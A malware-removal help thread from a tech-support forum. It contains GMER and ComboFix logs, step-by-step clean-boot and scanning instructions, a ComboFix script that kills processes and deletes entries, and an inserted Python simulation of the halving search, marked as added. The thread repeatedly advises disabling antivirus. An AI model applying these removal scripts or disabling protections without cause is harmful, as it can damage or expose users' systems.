Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\00000001 
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\[email protected] 0x20 0x01 0x00 0x00 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\[email protected] 0xC2 0xF8 0x53 0x51 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\00000001\0Jf40 
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\00000001\[email protected] 0x5D 0x8B 0xF9 0xA4 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04 (not active ControlSet) 
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\[email protected] 0
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\[email protected] 0xAD 0x66 0x47 0x5B ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\[email protected] C:\Program Files\Alcohol Soft\Alcohol 52\
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001 (not active ControlSet) 
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\[email protected] 0xBB 0x65 0xF9 0xC7 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\[email protected] 0x20 0x01 0x00 0x00 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001\jdgg40 (not active ControlSet) 
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001\[email protected] 0x6E 0x90 0x05 0x13 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001\jdgg41 (not active ControlSet) 
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001\[email protected] 0xC2 0x5F 0x4E 0x41 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4 (not active ControlSet) 
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\[email protected]0 C:\Program Files\DAEMON Tools Lite\
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\[email protected] 1
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\[email protected] 0xA8 0x7C 0x8B 0xB0 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\00000001 (not active ControlSet) 
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\[email protected] 0x20 0x01 0x00 0x00 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\[email protected] 0xC2 0xF8 0x53 0x51 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\00000001\0Jf40 (not active ControlSet) 
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\00000001\[email protected] 0x5D 0x8B 0xF9 0xA4 ...
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\9040820900063D11C8EF00054038389C\[email protected] 1086484348
Reg HKLM\SOFTWARE\Classes\[email protected] text
Reg HKLM\SOFTWARE\Classes\[email protected] htafile
Reg HKLM\SOFTWARE\Classes\[email protected] Type application/hta
Reg HKLM\SOFTWARE\Classes\.hta\PersistentHandler 
Reg HKLM\SOFTWARE\Classes\.hta\[email protected] {eec97550-47a9-11cf-b952-00aa0051fe20}
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui [email protected] C:\Windows\system32\javaws.exe -uninstall -prompt "http://www.javazoom.com/jlgui/jws/jlgui3.0.jarjnlp"
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui [email protected] jlGui 3.0
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui [email protected] C:\Users\GAGAN\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\57\573addb9-2492e35c.ico
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui [email protected] 1
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui [email protected] 1
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui [email protected] Music Player for the Java(tm) Platform
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui [email protected] jlGui supports MP3, OGG VORBIS, FLAC, SPEEX, WAV, AIFF, AU audio formats. It ...
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui [email protected] http://www.javazoom.net

---- EOF - GMER 1.0.15 ----


----------



## Mark1956 (May 7, 2011)

> I'm sorry I was not very clear about the popup. It starts as soon as I turn on the computer and is above all windows even if I've not opened any browser. If I'm not connected to the internet it still pops up but does not become the active window.


Not a problem.



> I'm not sure about the virus you mentioned. I have had a few serious infections which were solved with Malwarebytes, mostly in safe mode. I have more than one person using this computer and have been infected with the fake antivirus virus more than once.


That would explain the Malware trace found by TDSSKiller:
*00:54:15.0277 4376 \Device\Harddisk0\DR0 ( TDSS File System ) - warning*

After this is cleared up I shall give some closing advice to help keep you better protected.

Please now follow this guide. I have only just created it, so I hope you can follow it; any hitches, then please let me know.

Selective Startup (Clean Boot)

I would recommend you print out these instructions and follow them slowly, one line at a time, as it is very easy to get confused with this. Unfortunately this is probably the only way we can find what is causing your problem.

Click on *Start*, then type *msconfig* into the *Search* box and hit the *Enter* key.
This screen should appear with the settings as shown:

Click on the Services tab and you should see this. Click on the box next to *Hide all Microsoft Services* so a check mark appears.

Now click on the General tab and check the boxes as shown:

When done click on *Apply* and then *OK*.
The window will close and you will see a notification with two choices, click on *Restart*.
*After reboot check to see if the problem still exists, if it does then post back and wait for further guidance, if it appears to have been cured then please continue with these instructions.*
Open *msconfig* again in the same way as before. Under the *General* tab click the box next to *Load System Services* so it appears checked, click on *Apply* then *OK* and as before select *Restart* when the options appear.
Check again to see if the problem has returned. If *it has* then we are looking for a bad *Service*, if the problem *has not* returned we are looking for a bad *Startup* item.
Now open *msconfig* again, leave the check mark for *Selective Startup* and check both the boxes for *Load System Services* and *Load Startup Items*; these settings can now be left untouched until the end of the process.

If it was found that we are looking for a bad *Service* click on the *Services* tab. Or, if we are looking for a *Startup* item click on the *Startup* tab.
Now you have the list in view and we know that the item responsible for the problem is one of them. You can go the long, but less confusing, route of disabling one at a time, clicking on *Apply*, *OK* and *Restart* and checking again, but that could take a long time.
The quickest method is to disable (by unchecking the item/s) half at a time and then repeating the process and disabling half of the remaining items until the problem stops.
Once the problem has gone you will know that it is being caused by one of the items you have just disabled. You then need to go back and re-enable (by putting the check mark back next to the item) half of them. It is easy to make mistakes when doing this so keeping notes will help. Alternatively you can just disable items in groups of 6 at a time; the method you use is up to you. Once you get the hang of it you should soon find the item that has caused all this time-consuming work.
Once you have isolated the item then post back with the details.
If you move the mouse pointer over the top bar that has the column names in, it will change appearance as it goes over the divider. Click and hold, then drag so you can expand the column width and get the full details that are listed. I will need the full information from all the columns.
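The halving procedure in the post above, as an added Python simulation that is not from the thread or from msconfig: it runs the same search over a constructed list of twelve startup items and counts the reboot-and-check rounds, so the saving over disabling one item per reboot is visible. The `problem_present` oracle stands in for one reboot followed by waiting to see whether the popup returns; the item names and the culprit are constructed. The simulation assumes exactly one item is responsible and that the problem reproduces on every reboot, which is why the post says to keep notes: one misread check sends the search to the wrong item.

```python
def bisect_culprit(items, problem_present):
    """Halve the candidate set each round, as the post describes.

    items: startup items, all enabled at the start.
    problem_present(enabled): oracle returning True if the problem shows up
        when exactly these items are enabled. Each call is one reboot.
    Returns (culprit, reboots, notes); notes records per round which items
    were left enabled and what was observed, the "keep notes" step.
    """
    if not items:
        raise ValueError("nothing to bisect")
    candidates = list(items)
    reboots = 0
    notes = []
    while len(candidates) > 1:
        half = candidates[: len(candidates) // 2]
        # Leave only `half` enabled, reboot, and watch for the popup.
        seen = problem_present(set(half))
        reboots += 1
        notes.append((list(half), seen))
        # Problem still there: culprit is in `half`; gone: it is in the rest.
        candidates = half if seen else candidates[len(candidates) // 2 :]
    return candidates[0], reboots, notes


def one_at_a_time(items, problem_present):
    """The slower route the post mentions: disable one item per reboot."""
    enabled = set(items)
    reboots = 0
    for item in items:
        enabled.discard(item)
        reboots += 1
        if not problem_present(enabled):   # popup gone: this was the one
            return item, reboots
        enabled.add(item)
    return None, reboots


# Constructed data for the demonstration (not real startup entries).
ITEMS = [f"startup-item-{i:02d}" for i in range(1, 13)]
CULPRIT = ITEMS[10]


def demo_oracle(enabled):
    """Stands in for 'reboot and see whether the popup comes back'."""
    return CULPRIT in enabled


if __name__ == "__main__":
    found, rounds, notes = bisect_culprit(ITEMS, demo_oracle)
    print(f"halving: {found} after {rounds} reboots")
    for left_enabled, seen in notes:
        print(f"  enabled {len(left_enabled)} items, problem present: {seen}")
    found, rounds = one_at_a_time(ITEMS, demo_oracle)
    print(f"one at a time: {found} after {rounds} reboots")
```

With twelve items the halving search needs four reboots here (at most the base-2 logarithm of the item count, rounded up), while disabling one item per reboot needs eleven for this culprit.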


----------



## gagraptor (May 23, 2012)

OK, I'm not sure what happened. I followed your instructions to the T. After I enabled all services and startup items the popup is gone, and I ran Malwarebytes and it does not find any infections. I had disabled some startup items a few months ago as they were from sources I did not recognize. I enabled them too. I'm not sure what happened???


----------



## gagraptor (May 23, 2012)

PS: my physical memory usage is always above 50%.


----------



## Mark1956 (May 7, 2011)

Ok, a clean scan result with Malwarebytes is a good sign, but high memory usage is a worry and needs to be looked at. When you open Task Manager can you see what process is using the memory? You need to check this with no browser or any software running.

I think we should now do an online scan.

*Eset online scan instructions.*
*IMPORTANT --->* Please make sure you follow the instruction to *uncheck* the box next to *Remove found threats*. Eset will detect anything that looks even remotely suspicious; this can include legitimate program files. If you do not uncheck the box, as instructed, Eset will automatically remove all suspect files, which could leave some of your software inoperative. If you make a mistake these files can be restored from quarantine, but it would be preferable not to add any extra work to the clean up of your system.

Disable your existing Anti Virus following these instructions.
Please go here to use the Eset Online Scanner.
When the web page opens click on this button.

If you are not using *Internet Explorer* you will see a message box open asking you to download the *ESET Smart Installer*, click on the link and allow it to download and then run it. Accept the *Terms of use* and click on *Start*. The required components will download.
If using Internet Explorer the *Terms of use* box will open immediately, accept it and click on *Start*.
After the download is complete the *Computer scan settings* window will open, *IMPORTANT ---->* *uncheck* the box next to *Remove found threats* and click on *Start*. The virus signature database will then download which may take some time depending on the speed of your internet connection. The scan will automatically start when the download is complete.
This is a very thorough scan and may take several hours to complete depending on how much data you have on your hard drive. *Do not* interrupt it, be patient and let it finish.
A Scan Results window will appear at the end of the scan. If it lists any number of Infected Files click on List of found threats. Click on Copy to clipboard, come back to this thread and right click on the message box. Select *Paste* and the report will appear, add any comments you have and post the reply.
Back on the *Eset* window, click the *Back* button and then click on *Finish*.


----------



## gagraptor (May 23, 2012)

C:\Program Files\Veoh Networks\VeohWebPlayer\qlipso-qlipso-silent-us.exe	a variant of Win32/Toolbar.Zugo application
C:\Users\GAGAN\Downloads\VeohWebPlayerSetup_eng.exe	a variant of Win32/Toolbar.Zugo application


----------



## Mark1956 (May 7, 2011)

Looks like your system is clean. The two detections are from legitimate software on your system.

You didn't answer this:


> When you open Task Manager can you see what process is using the memory? You need to check this with no browser or any software running.


How much physical memory does your PC have?
Click on Start > Control Panel > System, and tell me what it shows as Installed memory.
___________________________________________________________________________

Please run TDSSKiller again, when the scan results show up mark this for Deletion:

*\Device\Harddisk0\DR0 ( TDSS File System )*

Please post the log for me to check.

___________________________________________________________________________

This is just to clear out a couple of orphan entries left behind.

We are now going to run ComboFix a different way.
Open Notepad by clicking on *Start* and in the *Search* box type: *Notepad.exe* and hit *Enter*.
Copy and paste everything in the *code box* below into it.
_-- Note: Make sure Word Wrap is *unchecked* in Notepad by clicking on *Format* in the top menu._

```
KillAll::
DDS::
TB: {A057A204-BACC-4D26-9990-79A187E2698E} - No File
uRun: [<NO NAME>] 
mURLSearchHooks: H - No File
ClearJavaCache::
Reboot::
```

Save the file as *CFScript.txt* by choosing _Save As..._ in the File Menu, and save it to your Desktop where the ComboFix icon is also located.
Close your browser and *disconnect* from the Internet.
Now use your mouse to *drag*, then *drop* the CFScript.txt file on top of ComboFix.exe as seen in the image below.

This will start ComboFix again and launch the script.
ComboFix may reboot your system when it finishes. This is normal.
A log will be created just as before and saved to C:\ComboFix.txt. Please copy and paste the contents of *ComboFix.txt* in your next reply.
Be sure to *re-enable* your anti-virus and other security programs *after* the scan is complete.
__________________________________________________________________________

Download Security Check by screen317 from Here or Here.
Save it to your Desktop.
Double click SecurityCheck.exe (Vista or Windows 7 users right click and select "Run as Administrator") and follow the onscreen instructions inside of the black box. Press any key when asked.
A Notepad document should open automatically called checkup.txt; please post the contents of that document.

_________________________________________________________________________

Go Here, scroll down the page to the blue arrow where it says *"Download our FREE WinPatrol here"* and click on it to download. Install the program.
Launch the program and click on the *"Start up Programs"* tab.

Disable everything apart from your security software and see if that helps with the memory usage.

You can also use Winpatrol to disable the Windows Search indexer under the Services tab or follow this guide:
If you rarely use the search function to find files on your system then shutting down the Windows Search indexer can save on system resources. Please follow this guide: Windows Search Indexing in Vista/Windows 7

_________________________________________________________________________

After this we just have some cleaning up to do of all the tools used.


----------



## gagraptor (May 23, 2012)

ComboFix 12-06-08.02 - GAGAN 06/09/2012 1:17.4.2 - x86
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1917.1082 [GMT -4:00]
Running from: c:\users\GAGAN\Desktop\ComboFix.exe
Command switches used :: c:\users\GAGAN\Desktop\CFScript.txt
AV: Microsoft Security Essentials *Disabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
SP: Microsoft Security Essentials *Disabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
* Created a new restore point
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\windows\system32\drivers\etc\hosts.ics
.
.
((((((((((((((((((((((((( Files Created from 2012-05-09 to 2012-06-09 )))))))))))))))))))))))))))))))
.
.
2012-06-09 05:36 . 2012-06-09 05:50	--------	d-----w-	c:\users\GAGAN\AppData\Local\temp
2012-06-09 05:36 . 2012-06-09 05:36	--------	d-----w-	c:\users\Default\AppData\Local\temp
2012-06-09 05:08 . 2012-06-09 05:08	29904	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{FEAD2235-D668-4335-86CF-32C221B7FC34}\MpKsl1a49a7d1.sys
2012-06-09 05:08 . 2012-06-09 05:08	56200	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{FEAD2235-D668-4335-86CF-32C221B7FC34}\offreg.dll
2012-06-09 05:02 . 2012-05-08 13:40	6737808	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{FEAD2235-D668-4335-86CF-32C221B7FC34}\mpengine.dll
2012-06-06 07:06 . 2012-06-06 07:06	--------	d-----w-	c:\program files\ESET
2012-06-03 06:04 . 2012-05-08 13:40	6737808	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2012-05-22 05:16 . 2012-05-22 05:16	713784	------w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{F78CEF23-EB95-4DED-8458-48E319614326}\gapaengine.dll
2012-05-22 05:09 . 2012-05-22 05:10	--------	d-----w-	c:\program files\Microsoft Security Client
2012-05-19 05:43 . 2012-05-19 09:50	--------	d-----w-	c:\programdata\vsint
2012-05-14 22:57 . 2012-03-20 23:28	53120	----a-w-	c:\windows\system32\drivers\partmgr.sys
2012-05-14 22:57 . 2012-03-30 12:39	914304	----a-w-	c:\windows\system32\drivers\tcpip.sys
2012-05-14 22:57 . 2012-03-29 13:39	31232	----a-w-	c:\windows\system32\drivers\tcpipreg.sys
2012-05-14 22:57 . 2012-02-01 15:10	1404928	----a-w-	c:\program files\Common Files\Microsoft Shared\ink\InkObj.dll
2012-05-14 22:57 . 2012-02-01 15:10	936960	----a-w-	c:\program files\Common Files\Microsoft Shared\ink\journal.dll
2012-05-14 22:57 . 2012-02-29 13:41	1069056	----a-w-	c:\windows\system32\DWrite.dll
2012-05-14 22:57 . 2012-03-01 14:46	219648	----a-w-	c:\windows\system32\d3d10_1core.dll
2012-05-14 22:57 . 2012-02-29 14:08	1172480	----a-w-	c:\windows\system32\d3d10warp.dll
2012-05-14 22:57 . 2012-03-01 14:46	160768	----a-w-	c:\windows\system32\d3d10_1.dll
2012-05-14 22:57 . 2012-02-29 13:44	683008	----a-w-	c:\windows\system32\d2d1.dll
2012-05-14 22:56 . 2012-04-03 08:16	3550080	----a-w-	c:\windows\system32\ntoskrnl.exe
2012-05-14 22:56 . 2012-04-03 08:16	3602816	----a-w-	c:\windows\system32\ntkrnlpa.exe
2012-05-14 22:56 . 2012-04-02 13:36	2044928	----a-w-	c:\windows\system32\win32k.sys
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-05-08 16:40 . 2012-05-19 08:37	6737808	----a-w-	c:\programdata\Microsoft\Windows Defender\Definition Updates\{3070EC37-30CA-43AE-AC15-BBE0716A8AAD}\mpengine.dll
2012-05-05 06:08 . 2012-04-07 05:22	419488	----a-w-	c:\windows\system32\FlashPlayerApp.exe
2012-05-05 06:08 . 2011-06-14 22:11	70304	----a-w-	c:\windows\system32\FlashPlayerCPLApp.cpl
2012-04-04 19:56 . 2010-02-20 07:40	22344	----a-w-	c:\windows\system32\drivers\mbam.sys
2012-03-21 00:44 . 2012-03-21 00:44	74112	----a-w-	c:\windows\system32\drivers\NisDrvWFP.sys
2012-03-21 00:44 . 2012-03-21 00:44	171064	----a-w-	c:\windows\system32\drivers\MpFilter.sys
2012-05-09 04:58 . 2011-06-08 03:45	97208	----a-w-	c:\program files\mozilla firefox\components\browsercomps.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{e9df9360-97f8-4690-afe6-996c80790da4}]
2011-05-09 08:49	176936	----a-w-	c:\program files\uTorrentControl\prxtbuTor.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
"{E9DF9360-97F8-4690-AFE6-996C80790DA4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Pando Media Booster"="c:\program files\Pando Networks\Media Booster\PMB.exe" [2009-02-27 2785608]
"googletalk"="c:\users\GAGAN\AppData\Roaming\Google\Google Talk\googletalk.exe" [2007-01-01 3739648]
"Akamai NetSession Interface"="c:\users\GAGAN\AppData\Local\Akamai\netsession_win.exe" [2012-05-08 3331872]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-11 1233920]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"HWSetup"="\HWSetup.exe hwSetUP" [X]
"TPwrMain"="c:\program files\TOSHIBA\Power Saver\TPwrMain.EXE" [2007-03-29 411192]
"TkBellExe"="c:\program files\real\realplayer\Update\realsched.exe" [2011-12-01 296056]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2009-03-20 1451304]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2012-01-17 252296]
"SmoothView"="c:\program files\Toshiba\SmoothView\SmoothView.exe" [2007-03-22 448632]
"Skytel"="Skytel.exe" [2007-05-29 1826816]
"RtHDVCpl"="RtHDVCpl.exe" [2007-06-13 4489216]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2011-10-24 421888]
"NBAgent"="c:\program files\Nero\Nero BackItUp & Burn\Nero BackItUp\NBAgent.exe" [2009-06-18 1062184]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2012-03-26 931200]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2012-03-27 421736]
"HSON"="c:\program files\TOSHIBA\TBS\HSON.exe" [2006-12-07 55416]
"dldtmon.exe"="c:\program files\Dell V305\dldtmon.exe" [2010-02-10 672424]
"dldtamon"="c:\program files\Dell V305\dldtamon.exe" [2010-02-10 16040]
"DivXUpdate"="c:\program files\DivX\DivX Update\DivXUpdate.exe" [2011-07-28 1259376]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-02-21 59240]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2006-09-11 180224]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2008-10-15 39792]
"00TCrdMain"="c:\program files\TOSHIBA\FlashCards\TCrdMain.exe" [2007-04-27 538744]
"SVPWUTIL"="c:\program files\TOSHIBA\Utilities\SVPWUTIL.exe" [2006-03-23 438272]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2006-11-10 90112]
"KeNotify"="c:\program files\TOSHIBA\Utilities\KeNotify.exe" [2006-11-07 34352]
"Camera Assistant Software"="c:\program files\Camera Assistant Software for Toshiba\traybar.exe" [2007-04-10 413696]
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"Picasa Media Detector"="c:\program files\Picasa2\PicasaMediaDetector.exe" [2007-10-23 443968]
.
c:\users\GAGAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
OneNote 2007 Screen Clipper and Launcher.lnk - c:\program files\Microsoft Office\Office12\ONENOTEM.EXE [N/A]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Metacafe.lnk - c:\program files\Metacafe\MetacafeAgent.exe [N/A]
Microsoft Office.lnk - c:\program files\Microsoft Office\Office10\OSA.EXE [2001-2-13 83360]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableUIADesktopToggle"= 0 (0x0)
"EnableLinkedConnections"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"aux1"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiSpyware]
"DisableMonitoring"=dword:00000001
.
R3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-05-05 257696]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
LocalServiceAndNoImpersonation	REG_MULTI_SZ FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2012-06-09 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-07 06:08]
.
2012-06-01 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000Core.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2012-06-06 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000UA.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2011-01-29 c:\windows\Tasks\User_Feed_Synchronization-{EA4C49AC-05D5-4334-B956-853DDFB08609}.job
- c:\windows\system32\msfeedssync.exe [2012-04-12 08:09]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://search.imesh.com/
mStart Page = hxxp://home.sweetim.com
mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
uInternet Settings,ProxyOverride = *.local;<local>
LSP: c:\windows\system32\wpclsp.dll
TCP: DhcpNameServer = 192.168.1.1
FF - ProfilePath - c:\users\GAGAN\AppData\Roaming\Mozilla\Firefox\Profiles\bav5d5wt.default\
FF - prefs.js: browser.search.selectedEngine - GoogIe
FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
FF - user.js: browser.search.selectedEngine - GoogIe
FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
FF - user.js: yahoo.homepage.dontask - true
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2012-06-09 01:48
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ... 
.
scanning hidden autostart entries ... 
.
scanning hidden files ... 
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.flac\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m3u\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.midi\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp3\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ogg\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pcm\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pls\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.spx\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow]
@Denied: (Read) (RestrictedCode)
@Denied: (Read) (LocalSystem)
@Denied: (Read) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Read) (Administrators)
@SACL=(02 0001)
@Ace=(0x11) (1) (S-1-16-4096)
.
